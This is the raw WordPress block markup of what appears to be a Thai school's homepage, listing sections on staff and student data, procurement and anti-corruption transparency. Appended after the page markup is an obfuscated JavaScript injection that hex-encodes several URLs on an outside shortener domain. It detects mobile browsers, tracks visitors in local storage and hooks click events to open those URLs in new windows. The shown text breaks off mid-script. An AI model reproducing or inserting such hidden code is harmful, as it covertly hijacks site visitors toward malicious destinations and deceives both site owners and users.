class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 